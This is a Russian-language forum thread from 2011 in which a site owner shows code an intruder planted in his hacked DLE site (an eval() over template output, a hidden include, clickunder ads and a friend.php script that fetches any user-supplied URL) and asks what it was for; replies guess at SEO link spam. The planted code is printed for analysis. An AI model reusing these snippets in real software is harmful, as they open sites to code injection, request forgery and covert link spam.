Меня ломанули, но вопрос в другом..

Discussion in 'Безопасность и Анонимность' started by spiderbuber, 25 Apr 2011.

  1. spiderbuber

    spiderbuber New Member

    Joined:
    20 Oct 2010
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    Взломали один из моих старых трафистых сайтов. Я тут не буду спрашивать "как это произошло?", "как защититься?" и т.д. меня интересует другое..
    Как взломщик в дальнейшем использовал коды, которые он прописал?..
    Сайт на движке ДЛЕ. Было вставлено пару кликандеров в шаблон. А также в index.php было прописано следующее:
    PHP:
    $width 120;
    $height62;
    $tpl->result['content'] = str_replace('border="0" width="120" height="50"''border="0" width="'.$width.'" height="'.$height.'"'$tpl->result['content']);
    Я так понимаю это использовалось для удаленной вставки какой-то рекламы или я ошибаюсь?
    Еще вместо:
    PHP:
    echo $tpl->result['main'];
    Было:
    PHP:
    eval (' ?' '>' $tpl->result['main'] . '<' '?php ');
    Думаю, это для того, чтобы в шаб можно было вставить пхп-код (типа шелл залить и т.д.). Так ли это?

    Еще левак:
    PHP:
    @include_once($_SERVER[’DOCUMENT_ROOT’]./stat.php’); 
    Файл stat.php на сервере я так и не обнаружил, поэтому хз нафига было инклудить его. Зато в корне сайта лежал файлик friend.php следующего содержания:

    PHP:
    <?php
    if(!empty($_GET["link"]))
    {
    if (!    stristr($_GET["link"], "http")) $_GET["link"]="http://".$_GET["link"];
    $page file_get_contents($_GET["link"]);
    preg_match("#<title>(.*)<\/title>#is"$page$match);
    $title $match[1];
    echo     "<a href=\"".$_GET["link"]."\">".$title."</a>";
    }
    else
    {
    echo     "The website you have requested is temporarily unavailable.

    We are currently working to resolve the problem.

    Please try again later."    ;
    }
    ?>
    Я так думаю, через этот файлик и шло всё управление, типа подгрузки шелла. Я прав?

    И еще.. кто узнал "своё творение", прошу связаться со мной. Нет, я не буду ругаться и сориться, просто хочу скажем так, обменяться опытом и проконсультироваться.
     
    #1 spiderbuber, 25 Apr 2011
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Он просто к тебе впихнули систему SAPE.ru. Правда немного изменённую, для того что б пользователи не смогли догадаться.

    А та строчка, через которую как ты думаешь он выполняет PHP код, это просто поддержка PHP кода в HTML.
     
    #2 randman, 25 Apr 2011
    Last edited: 25 Apr 2011
  3. spiderbuber

    spiderbuber New Member

    Joined:
    20 Oct 2010
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    Нет. Биржи у меня и так стоят (сапа и линкфид), так что на 1 площадку нельзя повешать 2 одинаковых кода!
     
    #3 spiderbuber, 26 Apr 2011
  4. wazwazwaz

    wazwazwaz New Member

    Joined:
    2 Nov 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Friend.php для следующего:

    обращение к тебе по
    domain.ru/friend.php?url=site.ru/seo

    покажет ссылку на site.ru/seo с анкором = заголовку страницы site.ru/seo

    Полезно для продвижения.
    Правда не знаю, сильный ли эффект даст, xss же вроде умерло..
     
    #4 wazwazwaz, 26 Apr 2011
(You must log in or sign up to post here.)